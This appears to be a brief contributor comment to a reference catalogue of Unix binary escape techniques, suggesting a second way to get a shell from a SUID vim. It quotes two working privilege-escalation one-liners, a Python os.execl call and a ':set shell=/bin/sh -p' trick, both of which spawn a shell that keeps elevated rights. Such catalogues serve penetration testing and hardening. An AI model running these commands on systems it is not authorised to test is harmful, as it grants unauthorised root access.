Hi! The section about SUID with only mentoins this option: > ./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' This can be added: >./vim -c ':set shell=/bin/sh\ -p|shell' benefit is that this doesn't require python support.